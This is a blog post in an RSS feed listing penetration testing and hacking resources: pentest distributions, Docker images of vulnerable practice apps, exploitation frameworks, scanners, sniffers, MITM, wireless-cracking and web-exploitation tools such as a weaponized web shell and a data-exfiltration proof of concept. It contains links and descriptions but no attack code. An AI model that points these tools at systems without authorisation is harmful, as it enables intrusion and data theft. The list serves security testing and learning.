<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>pentest Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/pentest/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/pentest/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Wed, 16 Dec 2020 09:25:36 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>pentest Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/pentest/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>A Complete Penetration Testing &#038; Hacking Tools List for Hackers &#038; Security Professionals</title>
		<link>http://kostacipo.stream/a-complete-penetration-testing-hacking-tools-list-for-hackers-security-professionals/</link>
					<comments>http://kostacipo.stream/a-complete-penetration-testing-hacking-tools-list-for-hackers-security-professionals/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 16 Dec 2020 09:25:36 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[tools]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1964</guid>

					<description><![CDATA[<p>Penetration Testing &#38; Hacking Tools are more often used by security industries to test the vulnerabilities in network and applications. Here you can find the Comprehensive Penetration Testing &#38; Haking Tools list that covers Performing Penetration testing Operation in all Environments. Penetration testing and ethical hacking tools are very essential part for every organization to [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/a-complete-penetration-testing-hacking-tools-list-for-hackers-security-professionals/">A Complete Penetration Testing &#038; Hacking Tools List for Hackers &#038; Security Professionals</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Penetration Testing &amp; <strong>Hacking Tools</strong> are more often used by security industries to test the vulnerabilities in network and applications. Here you can find the Comprehensive Penetration Testing &amp; <strong>Haking Tools</strong> list that covers Performing Penetration testing Operation in all Environments.</p>
<p>Penetration testing and ethical <strong>hacking tools</strong> are very essential part for every organization to test the vulnerabilities and patch the vulnerable system.</p>
<p>Since the cyber attacks are rapidly increasing, organization need to pay high attention on penetration testing and keep monitoring their network to prevent the attack that may cause a serious damage that leads to hit the company reputation.</p>
<p>In order to manage a security operations, security experts and researchers needs to rely with the security and hacking tools that helps them to minimize the time and effectively monitoring and perform penetration testing on the network to protect the network.</p>
<p>Here we are posting the big list of some of the most important hacking tools that widely used by million of security professionals and thousand of organization around the world.</p>
<h2><strong>Penetration Testing &amp; Hacking Tools List</strong></h2>
<h3><a id="user-content-online-resources" class="anchor" href="https://github.com/enaqx/awesome-pentest#online-resources" aria-hidden="true"></a><strong>Online Resources – Hacking Tools</strong></h3>
<h4><a id="user-content-penetration-testing-resources" class="anchor" href="https://github.com/enaqx/awesome-pentest#penetration-testing-resources" aria-hidden="true"></a><strong>Penetration Testing Resources</strong></h4>
<ul>
<li>Metasploit Unleashed&nbsp;– Free Offensive Security Metasploit course.</li>
<li><a href="http://www.pentest-standard.org/" target="_blank" rel="nofollow noopener noreferrer">Penetration Testing Execution Standard (PTES)</a>&nbsp;– Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.</li>
<li><a href="https://www.owasp.org/index.php/Main_Page" target="_blank" rel="nofollow noopener noreferrer">Open Web Application Security Project (OWASP)</a>&nbsp;– Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.</li>
<li><a href="https://github.com/nixawk/pentest-wiki" target="_blank" rel="nofollow noopener noreferrer">PENTEST-WIKI</a>&nbsp;– Free online security knowledge library for pentesters and researchers.</li>
<li><a href="http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html" target="_blank" rel="nofollow noopener noreferrer">Penetration Testing Framework (PTF)</a>&nbsp;– Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.</li>
<li><a href="http://www.xss-payloads.com/" target="_blank" rel="nofollow noopener noreferrer">XSS-Payloads</a>&nbsp;– Ultimate resource for all things cross-site including payloads, tools, games and documentation.</li>
<li><a href="http://www.isecom.org/mirror/OSSTMM.3.pdf" target="_blank" rel="nofollow noopener noreferrer">Open Source Security Testing Methodology Manual (OSSTMM)</a>&nbsp;– Framework for providing test cases that result in verified facts on which to base decisions that impact an organization’s security.</li>
<li><a href="https://attack.mitre.org/" target="_blank" rel="nofollow noopener noreferrer">MITRE’s Adversarial Tactics, Techniques &amp; Common Knowledge (ATT&amp;CK)</a>&nbsp;– Curated knowledge base and model for cyber adversary behavior.</li>
</ul>
<h3><a id="user-content-exploit-development" class="anchor" href="https://github.com/enaqx/awesome-pentest#exploit-development" aria-hidden="true"></a><strong>Exploit Development</strong></h3>
<ul>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html" target="_blank" rel="nofollow noopener noreferrer">Shellcode Tutorial</a>&nbsp;– Tutorial on how to write shellcode.</li>
<li><a href="http://shell-storm.org/shellcode/" target="_blank" rel="nofollow noopener noreferrer">Shellcode Examples</a>&nbsp;– Shellcodes database.</li>
<li><a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/" target="_blank" rel="nofollow noopener noreferrer">Exploit Writing Tutorials</a>&nbsp;– Tutorials on how to develop exploits.</li>
</ul>
<h3><a id="user-content-osint-resources" class="anchor" href="https://github.com/enaqx/awesome-pentest#osint-resources" aria-hidden="true"></a><strong>OSINT Resources</strong></h3>
<ul>
<li><a href="http://osintframework.com/" target="_blank" rel="nofollow noopener noreferrer">OSINT Framework</a>&nbsp;– Collection of various OSINT Hacking Tools broken out by category.</li>
<li><a href="https://inteltechniques.com/menu.html" target="_blank" rel="nofollow noopener noreferrer">Intel Techniques</a>&nbsp;– Collection of OSINT tools. Menu on the left can be used to navigate through the categories.</li>
<li><a href="http://netbootcamp.org/osinttools/" target="_blank" rel="nofollow noopener noreferrer">NetBootcamp OSINT Tools</a>&nbsp;– Collection of OSINT links and custom Web interfaces to other services such as&nbsp;<a href="http://netbootcamp.org/facebook.html" target="_blank" rel="nofollow noopener noreferrer">Facebook Graph Search</a>&nbsp;and&nbsp;<a href="http://netbootcamp.org/pastesearch.html" target="_blank" rel="nofollow noopener noreferrer">various paste sites</a>.</li>
<li><a href="https://wigle.net/" rel="nofollow">WiGLE.net</a>&nbsp;– Information about wireless networks world-wide, with user-friendly desktop and web applications.</li>
</ul>
<h3><a id="user-content-social-engineering-resources" class="anchor" href="https://github.com/enaqx/awesome-pentest#social-engineering-resources" aria-hidden="true"></a><strong>Social Engineering Resources</strong></h3>
<ul>
<li><a href="http://www.social-engineer.org/framework/general-discussion/" target="_blank" rel="nofollow noopener noreferrer">Social Engineering Framework</a>&nbsp;– Information resource for social engineers.</li>
</ul>
<h3><a id="user-content-lock-picking-resources" class="anchor" href="https://github.com/enaqx/awesome-pentest#lock-picking-resources" aria-hidden="true"></a><strong>Lock Picking Resources</strong></h3>
<ul>
<li><a href="https://www.youtube.com/user/SchuylerTowne/" target="_blank" rel="nofollow noopener noreferrer">Schuyler Towne channel</a>&nbsp;– Lockpicking videos and security talks.</li>
<li><a href="https://www.youtube.com/user/bosnianbill" target="_blank" rel="nofollow noopener noreferrer">bosnianbill</a>&nbsp;– More lockpicking videos.</li>
<li><a href="https://www.reddit.com/r/lockpicking" target="_blank" rel="nofollow noopener noreferrer">/r/lockpicking</a>&nbsp;– Resources for learning lockpicking, equipment recommendations.</li>
</ul>
<h3><a id="user-content-operating-systems" class="anchor" href="https://github.com/enaqx/awesome-pentest#operating-systems" aria-hidden="true"></a><strong>Operating Systems</strong></h3>
<ul>
<li><a href="http://rawsec.ml/en/security-related-os/" target="_blank" rel="nofollow noopener noreferrer">Security related Operating Systems @ Rawsec</a>&nbsp;–&nbsp;Penetration testing tools &amp; <strong>Hacking Tools</strong>&nbsp; list Related Complete list of security operating systems.</li>
<li><a href="https://n0where.net/best-linux-penetration-testing-distributions/" target="_blank" rel="nofollow noopener noreferrer">Best Linux Penetration Testing Distributions @ CyberPunk</a>&nbsp;– Description of main penetration testing distributions.</li>
<li><a href="http://distrowatch.com/search.php?category=Security" target="_blank" rel="nofollow noopener noreferrer">Security @ Distrowatch</a>&nbsp;– Website dedicated to talking about, reviewing, and keeping up to date with open source operating systems.</li>
<li><a href="https://github.com/cuckoosandbox/cuckoo" target="_blank" rel="nofollow noopener noreferrer">cuckoo</a>&nbsp;– Open source automated malware analysis system.</li>
<li><a href="http://www.caine-live.net/" target="_blank" rel="nofollow noopener noreferrer">Computer Aided Investigative Environment (CAINE)</a>&nbsp;– Italian GNU/Linux live distribution created as a digital forensics project.</li>
<li><a href="http://www.deftlinux.net/" target="_blank" rel="nofollow noopener noreferrer">Digital Evidence &amp; Forensics Toolkit (DEFT)</a>&nbsp;– Live CD for forensic analysis runnable without tampering or corrupting connected devices where the boot process takes place.</li>
<li><a href="https://tails.boum.org/" target="_blank" rel="nofollow noopener noreferrer">Tails</a>&nbsp;– Live OS aimed at preserving privacy and anonymity.</li>
</ul>
<h2><strong>Hacking Tools</strong></h2>
<h3><a id="user-content-penetration-testing-distributions" class="anchor" href="https://github.com/enaqx/awesome-pentest#penetration-testing-distributions" aria-hidden="true"></a><strong>Penetration Testing Distributions</strong></h3>
<ul>
<li><a href="https://www.kali.org/" target="_blank" rel="nofollow noopener noreferrer">Kali</a>&nbsp;– GNU/Linux distribution designed for digital forensics and penetration testing Hacking Tools</li>
<li><a href="https://archstrike.org/" target="_blank" rel="nofollow noopener noreferrer">ArchStrike</a>&nbsp;– Arch GNU/Linux repository for security professionals and enthusiasts.</li>
<li><a href="https://www.blackarch.org/" target="_blank" rel="nofollow noopener noreferrer">BlackArch</a> – Arch GNU/Linux-based distribution with <strong>best Hacking Tools</strong> for penetration testers and security researchers.</li>
<li><a href="http://networksecuritytoolkit.org/" target="_blank" rel="nofollow noopener noreferrer">Network Security Toolkit (NST)</a>&nbsp;– Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.</li>
<li><a href="http://www.pentoo.ch/" target="_blank" rel="nofollow noopener noreferrer">Pentoo</a>&nbsp;– Security-focused live CD based on Gentoo.</li>
<li><a href="https://backbox.org/" rel="nofollow">BackBox</a>&nbsp;– Ubuntu-based distribution for penetration tests and security assessments.</li>
<li><a href="https://www.parrotsec.org/" target="_blank" rel="nofollow noopener noreferrer">Parrot</a> – Distribution similar to Kali, with multiple architectures with 100 of Hacking Tools.</li>
<li><a href="https://inteltechniques.com/buscador/" target="_blank" rel="nofollow noopener noreferrer">Buscador</a>&nbsp;– GNU/Linux virtual machine that is pre-configured for online investigators.</li>
<li><a href="https://labs.fedoraproject.org/en/security/" target="_blank" rel="nofollow noopener noreferrer">Fedora Security Lab</a>&nbsp;– Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.</li>
<li><a href="https://github.com/trustedsec/ptf" target="_blank" rel="nofollow noopener noreferrer">The Pentesters Framework</a>&nbsp;– Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.</li>
<li><a href="https://github.com/adi0x90/attifyos" target="_blank" rel="nofollow noopener noreferrer">AttifyOS</a>&nbsp;– GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.</li>
</ul>
<h3><a id="user-content-docker-for-penetration-testing" class="anchor" href="https://github.com/enaqx/awesome-pentest#docker-for-penetration-testing" aria-hidden="true"></a><strong>Docker for Penetration Testing</strong></h3>
<ul>
<li><code>docker pull kalilinux/kali-linux-docker</code>&nbsp;<a href="https://hub.docker.com/r/kalilinux/kali-linux-docker/" rel="nofollow">official Kali Linux</a></li>
<li><code>docker pull owasp/zap2docker-stable</code>&nbsp;–&nbsp;<a href="https://github.com/zaproxy/zaproxy">official OWASP ZAP</a></li>
<li><code>docker pull wpscanteam/wpscan</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/wpscanteam/wpscan/" rel="nofollow">official WPScan</a></li>
<li><code>docker pull citizenstig/dvwa</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/citizenstig/dvwa/" rel="nofollow">Damn Vulnerable Web Application (DVWA)</a></li>
<li><code>docker pull wpscanteam/vulnerablewordpress</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/wpscanteam/vulnerablewordpress/" rel="nofollow">Vulnerable WordPress Installation</a></li>
<li><code>docker pull hmlio/vaas-cve-2014-6271</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/" rel="nofollow">Vulnerability as a service: Shellshock</a></li>
<li><code>docker pull hmlio/vaas-cve-2014-0160</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/" rel="nofollow">Vulnerability as a service: Heartbleed</a></li>
<li><code>docker pull opendns/security-ninjas</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/opendns/security-ninjas/" rel="nofollow">Security Ninjas</a></li>
<li><code>docker pull diogomonica/docker-bench-security</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/diogomonica/docker-bench-security/" rel="nofollow">Docker Bench for Security</a></li>
<li><code>docker pull ismisepaul/securityshepherd</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/ismisepaul/securityshepherd/" rel="nofollow">OWASP Security Shepherd</a></li>
<li><code>docker pull danmx/docker-owasp-webgoat</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/danmx/docker-owasp-webgoat/" rel="nofollow">OWASP WebGoat Project docker image</a></li>
<li><code>docker-compose build &amp;&amp; docker-compose up</code>&nbsp;–&nbsp;<a href="https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker">OWASP NodeGoat</a></li>
<li><code>docker pull citizenstig/nowasp</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/citizenstig/nowasp/" rel="nofollow">OWASP Mutillidae II Web Pen-Test Practice Application</a></li>
<li><code>docker pull bkimminich/juice-shop</code>&nbsp;–&nbsp;<a href="https://github.com/bkimminich/juice-shop#docker-container--">OWASP Juice Shop</a></li>
<li><code>docker pull kalilinux/kali-linux-docker</code>&nbsp;–&nbsp;<a href="https://www.kali.org/news/official-kali-linux-docker-images/" rel="nofollow">Kali Linux Docker Image</a></li>
<li><code>docker pull phocean/msf</code>&nbsp;–&nbsp;<a href="https://hub.docker.com/r/phocean/msf/" rel="nofollow">docker-metasploit</a></li>
</ul>
<h3><a id="user-content-multi-paradigm-frameworks" class="anchor" href="https://github.com/enaqx/awesome-pentest#multi-paradigm-frameworks" aria-hidden="true"></a><strong>Multi-paradigm Frameworks</strong></h3>
<ul>
<li><a href="https://www.metasploit.com/" rel="nofollow">Metasploit</a> – post exploitaion Hacking Tools for offensive security teams to help verify vulnerabilities and manage security assessments.</li>
<li><a href="http://fastandeasyhacking.com/" target="_blank" rel="nofollow noopener noreferrer">Armitage</a>&nbsp;– Java-based GUI front-end for the Metasploit Framework.</li>
<li><a href="https://github.com/infobyte/faraday">Faraday</a>&nbsp;– Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.</li>
<li><a href="https://github.com/juansacco/exploitpack">ExploitPack</a>&nbsp;– Graphical tool for automating penetration tests that ships with many pre-packaged exploits.</li>
<li><a href="https://github.com/n1nj4sec/pupy">Pupy</a>&nbsp;– Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool,</li>
</ul>
<h3><a id="user-content-vulnerability-scanners" class="anchor" href="https://github.com/enaqx/awesome-pentest#vulnerability-scanners" aria-hidden="true"></a><strong>Vulnerability Scanners</strong></h3>
<ul>
<li><a href="https://www.rapid7.com/products/nexpose/" rel="nofollow">Nexpose</a>&nbsp;– Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.</li>
<li><a href="https://www.tenable.com/products/nessus-vulnerability-scanner" rel="nofollow">Nessus</a>&nbsp;– Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable.</li>
<li><a href="http://www.openvas.org/" rel="nofollow">OpenVAS</a>&nbsp;– Free software implementation of the popular Nessus vulnerability assessment system.</li>
<li><a href="https://github.com/future-architect/vuls">Vuls</a>&nbsp;– Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.</li>
</ul>
<h3><a id="user-content-static-analyzers" class="anchor" href="https://github.com/enaqx/awesome-pentest#static-analyzers" aria-hidden="true"></a><strong>Static Analyzers</strong></h3>
<ul>
<li><a href="https://github.com/presidentbeef/brakeman">Brakeman</a>&nbsp;– Static analysis security vulnerability scanner for Ruby on Rails applications.</li>
<li><a href="http://cppcheck.sourceforge.net/" rel="nofollow">cppcheck</a>&nbsp;– Extensible C/C++ static analyzer focused on finding bugs.</li>
<li><a href="http://findbugs.sourceforge.net/" rel="nofollow">FindBugs</a>&nbsp;– Free software static analyzer to look for bugs in Java code.</li>
<li><a href="https://github.com/nccgroup/sobelow">sobelow</a>&nbsp;– Security-focused static analysis for the Phoenix Framework.</li>
<li><a href="https://pypi.python.org/pypi/bandit/" rel="nofollow">bandit</a>&nbsp;– Security oriented static analyser for python code.</li>
</ul>
<h3><a id="user-content-web-scanners" class="anchor" href="https://github.com/enaqx/awesome-pentest#web-scanners" aria-hidden="true"></a><strong>Web Scanners</strong></h3>
<ul>
<li><a href="https://cirt.net/nikto2" rel="nofollow">Nikto</a>&nbsp;– Noisy but fast black box web server and web application vulnerability scanner.</li>
<li><a href="http://www.arachni-scanner.com/" rel="nofollow">Arachni</a>&nbsp;– Scriptable framework for evaluating the security of web applications.</li>
<li><a href="https://github.com/andresriancho/w3af">w3af</a> – Hacking Tools for Web application attack and audit framework.</li>
<li><a href="http://wapiti.sourceforge.net/" rel="nofollow">Wapiti</a>&nbsp;– Black box web application vulnerability scanner with built-in fuzzer.</li>
<li><a href="https://secapps.com/" rel="nofollow">SecApps</a>&nbsp;– In-browser web application security testing suite.</li>
<li><a href="https://www.webreaver.com/" rel="nofollow">WebReaver</a>&nbsp;– Commercial, graphical web application vulnerability scanner designed for macOS.</li>
<li><a href="https://wpscan.org/" rel="nofollow">WPScan</a> – Hacking Tools of Black box WordPress vulnerability scanner.</li>
<li><a href="https://code.google.com/archive/p/cms-explorer/" rel="nofollow">cms-explorer</a>&nbsp;– Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.</li>
<li><a href="https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project" rel="nofollow">joomscan</a> – on of the best Hacking Tools for Joomla vulnerability scanner.</li>
<li><a href="https://github.com/tijme/angularjs-csti-scanner">ACSTIS</a>&nbsp;– Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.</li>
</ul>
<h3><a id="user-content-network-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#network-tools" aria-hidden="true"></a><strong>Network Tools</strong></h3>
<ul>
<li><a href="https://zmap.io/" rel="nofollow">zmap</a>&nbsp;– Open source network scanner that enables researchers to easily perform Internet-wide network studies.</li>
<li><a href="https://nmap.org/" rel="nofollow">nmap</a>&nbsp;– Free security scanner for network exploration &amp; security audits.</li>
<li><a href="https://github.com/rafael-santiago/pig">pig</a> – one of the Hacking Tools forGNU/Linux packet crafting .</li>
<li><a href="https://github.com/vesche/scanless">scanless</a>&nbsp;– Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.</li>
<li><a href="http://www.tcpdump.org/" rel="nofollow">tcpdump/libpcap</a>&nbsp;– Common packet analyzer that runs under the command line.</li>
<li><a href="https://www.wireshark.org/" rel="nofollow">Wireshark</a>&nbsp;– Widely-used graphical, cross-platform network protocol analyzer.</li>
<li><a href="http://network-tools.com/" rel="nofollow">Network-Tools.com</a>&nbsp;– Website offering an interface to numerous basic network utilities like&nbsp;<code>ping</code>,&nbsp;<code>traceroute</code>,&nbsp;<code>whois</code>, and more.</li>
<li><a href="https://github.com/netsniff-ng/netsniff-ng">netsniff-ng</a>&nbsp;– Swiss army knife for for network sniffing.</li>
<li><a href="http://sniff.su/" rel="nofollow">Intercepter-NG</a>&nbsp;– Multifunctional network toolkit.</li>
<li><a href="https://sparta.secforce.com/" rel="nofollow">SPARTA</a>&nbsp;– Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.</li>
<li><a href="https://github.com/iphelix/dnschef">dnschef</a>&nbsp;– Highly configurable DNS proxy for pentesters.</li>
<li><a href="https://dnsdumpster.com/" rel="nofollow">DNSDumpster</a> – one of the Hacking Tools for Online DNS recon and search service.</li>
<li><a href="https://github.com/m0rtem/CloudFail">CloudFail</a>&nbsp;– Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.</li>
<li><a href="https://github.com/fwaeytens/dnsenum/">dnsenum</a>&nbsp;– Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.</li>
<li><a href="https://github.com/makefu/dnsmap/">dnsmap</a> – One of the Hacking Tools for Passive DNS network mapper.</li>
<li><a href="https://github.com/darkoperator/dnsrecon/">dnsrecon</a> – One of the Hacking Tools for DNS enumeration script.</li>
<li><a href="http://www.mavetju.org/unix/dnstracer.php" rel="nofollow">dnstracer</a>&nbsp;– Determines where a given DNS server gets its information from, and follows the chain of DNS servers.</li>
<li><a href="https://github.com/chrislee35/passivedns-client">passivedns-client</a>&nbsp;– Library and query tool for querying several passive DNS providers.</li>
<li><a href="https://github.com/gamelinux/passivedns">passivedns</a>&nbsp;– Network sniffer that logs all DNS server replies for use in a passive DNS setup.</li>
<li><a href="https://github.com/robertdavidgraham/masscan">Mass Scan</a> – best Hacking Tools for TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.</li>
<li><a href="https://github.com/hatRiot/zarp">Zarp</a>&nbsp;– Network attack tool centered around the exploitation of local networks.</li>
<li><a href="https://github.com/mitmproxy/mitmproxy">mitmproxy</a>&nbsp;– Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.</li>
<li><a href="https://github.com/r00t-3xp10it/morpheus">Morpheus</a>&nbsp;– Automated ettercap TCP/IP Hacking Tools .</li>
<li><a href="https://github.com/justmao945/mallory">mallory</a>&nbsp;– HTTP/HTTPS proxy over SSH.</li>
<li><a href="https://github.com/jtesta/ssh-mitm">SSH MITM</a>&nbsp;– Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.</li>
<li><a href="https://github.com/netzob/netzob">Netzob</a>&nbsp;– Reverse engineering, traffic generation and fuzzing of communication protocols.</li>
<li><a href="https://github.com/sensepost/DET">DET</a>&nbsp;– Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.</li>
<li><a href="https://github.com/samyk/pwnat">pwnat</a>&nbsp;– Punches holes in firewalls and NATs.</li>
<li><a href="https://www.monkey.org/~dugsong/dsniff/" rel="nofollow">dsniff</a>&nbsp;– Collection of tools for network auditing and pentesting.</li>
<li><a href="http://tgcd.sourceforge.net/" rel="nofollow">tgcd</a>&nbsp;– Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.</li>
<li><a href="https://github.com/ShawnDEvans/smbmap">smbmap</a>&nbsp;– Handy SMB enumeration tool.</li>
<li><a href="https://github.com/secdev/scapy">scapy</a>&nbsp;– Python-based interactive packet manipulation program &amp; library.</li>
<li><a href="https://github.com/USArmyResearchLab/Dshell">Dshell</a>&nbsp;– Network forensic analysis framework.</li>
<li><a href="http://www.iwaxx.com/debookee/" rel="nofollow">Debookee</a>&nbsp;– Simple and powerful network traffic analyzer for macOS.</li>
<li><a href="https://github.com/dripcap/dripcap">Dripcap</a>&nbsp;– Caffeinated packet analyzer.</li>
<li><a href="https://github.com/RUB-NDS/PRET">Printer Exploitation Toolkit (PRET)</a>&nbsp;– Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.</li>
<li><a href="http://h.foofus.net/?page_id=218" rel="nofollow">Praeda</a>&nbsp;– Automated multi-function printer data harvester for gathering usable data during security assessments.</li>
<li><a href="https://github.com/reverse-shell/routersploit">routersploit</a>&nbsp;– Open source exploitation framework similar to Metasploit but dedicated to embedded devices.</li>
<li><a href="https://github.com/infobyte/evilgrade">evilgrade</a>&nbsp;– Modular framework to take advantage of poor upgrade implementations by injecting fake updates.</li>
<li><a href="https://github.com/evilsocket/xray">XRay</a>&nbsp;– Network (sub)domain discovery and reconnaissance automation tool.</li>
<li><a href="http://www.ettercap-project.org/" rel="nofollow">Ettercap</a>&nbsp;– Comprehensive, mature suite for machine-in-the-middle attacks.</li>
<li><a href="https://www.bettercap.org/" rel="nofollow">BetterCAP</a>&nbsp;– Modular, portable and easily extensible MITM framework.</li>
<li><a href="https://github.com/byt3bl33d3r/CrackMapExec">CrackMapExec</a>&nbsp;– A swiss army knife for pentesting networks.</li>
<li><a href="https://github.com/CoreSecurity/impacket">impacket</a>&nbsp;– A collection of Python classes for working with network protocols.</li>
</ul>
<h3><strong>Wireless Network Hacking Tools<br />
</strong></h3>
<ul>
<li><a href="http://www.aircrack-ng.org/" rel="nofollow">Aircrack-ng</a>&nbsp;– Set of Penetration testing &amp;&nbsp;Hacking Tools list for auditing wireless networks.</li>
<li><a href="https://kismetwireless.net/" rel="nofollow">Kismet</a>&nbsp;– Wireless network detector, sniffer, and IDS.</li>
<li><a href="https://code.google.com/archive/p/reaver-wps" rel="nofollow">Reaver</a>&nbsp;– Brute force attack against WiFi Protected Setup.</li>
<li><a href="https://github.com/derv82/wifite">Wifite</a>&nbsp;– Automated wireless attack tool.</li>
<li><a href="https://github.com/FluxionNetwork/fluxion">Fluxion</a>&nbsp;– Suite of automated social engineering based WPA attacks.</li>
</ul>
<h3><a id="user-content-transport-layer-security-tools" class="anchor" href="https://github.com/enaqx/awesome-pentest#transport-layer-security-tools" aria-hidden="true"></a><strong>Transport Layer Security Tools</strong></h3>
<ul>
<li><a href="https://github.com/nabla-c0d3/sslyze">SSLyze</a>&nbsp;– Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.</li>
<li><a href="https://github.com/WestpointLtd/tls_prober">tls_prober</a>&nbsp;– Fingerprint a server’s SSL/TLS implementation.</li>
<li><a href="https://github.com/drwetter/testssl.sh">testssl.sh</a>&nbsp;– Command line tool which checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.</li>
</ul>
<h3><a id="user-content-web-exploitation" class="anchor" href="https://github.com/enaqx/awesome-pentest#web-exploitation" aria-hidden="true"></a><strong>Web Exploitation</strong></h3>
<ul>
<li><a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" rel="nofollow">OWASP Zed Attack Proxy (ZAP)</a>&nbsp;– Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.</li>
<li><a href="https://www.telerik.com/fiddler" rel="nofollow">Fiddler</a>&nbsp;– Free cross-platform web debugging proxy with user-friendly companion tools.</li>
<li><a href="https://portswigger.net/burp/" rel="nofollow">Burp Suite</a> – One of the Hacking Tools ntegrated platform for performing security testing of web applications.</li>
<li><a href="https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/march/autochrome/" rel="nofollow">autochrome</a>&nbsp;– Easy to install a test browser with all the appropriate setting needed for web application testing with native Burp support, from NCCGroup.</li>
<li><a href="https://github.com/beefproject/beef">Browser Exploitation Framework (BeEF)</a>&nbsp;– Command and control server for delivering exploits to commandeered Web browsers.</li>
<li><a href="https://www.owasp.org/index.php/OWASP_OWTF" rel="nofollow">Offensive Web Testing Framework (OWTF)</a>&nbsp;– Python-based framework for pentesting Web applications based on the OWASP Testing Guide.</li>
<li><a href="https://github.com/rastating/wordpress-exploit-framework">WordPress Exploit Framework</a>&nbsp;– Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.</li>
<li><a href="https://github.com/espreto/wpsploit">WPSploit</a>&nbsp;– Exploit WordPress-powered websites with Metasploit.</li>
<li><a href="http://sqlmap.org/" rel="nofollow">SQLmap</a>&nbsp;– Automatic SQL injection and database takeover tool.</li>
<li><a href="https://github.com/epinna/tplmap">tplmap</a>&nbsp;– Automatic server-side template injection and Web server takeover Hacking Tools .</li>
<li><a href="https://github.com/epinna/weevely3">weevely3</a>&nbsp;– Weaponized web shell.</li>
<li><a href="https://www.wappalyzer.com/" rel="nofollow">Wappalyzer</a>&nbsp;– Wappalyzer uncovers the technologies used on websites.</li>
<li><a href="https://github.com/urbanadventurer/WhatWeb">WhatWeb</a>&nbsp;– Website fingerprinter.</li>
<li><a href="http://blindelephant.sourceforge.net/" rel="nofollow">BlindElephant</a>&nbsp;– Web application fingerprinter.</li>
<li><a href="https://github.com/EnableSecurity/wafw00f">wafw00f</a>&nbsp;– Identifies and fingerprints Web Application Firewall (WAF) products.</li>
<li><a href="https://github.com/kurobeats/fimap">fimap</a>&nbsp;– Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.</li>
<li><a href="https://github.com/D35m0nd142/Kadabra">Kadabra</a>&nbsp;– Automatic LFI exploiter and scanner.</li>
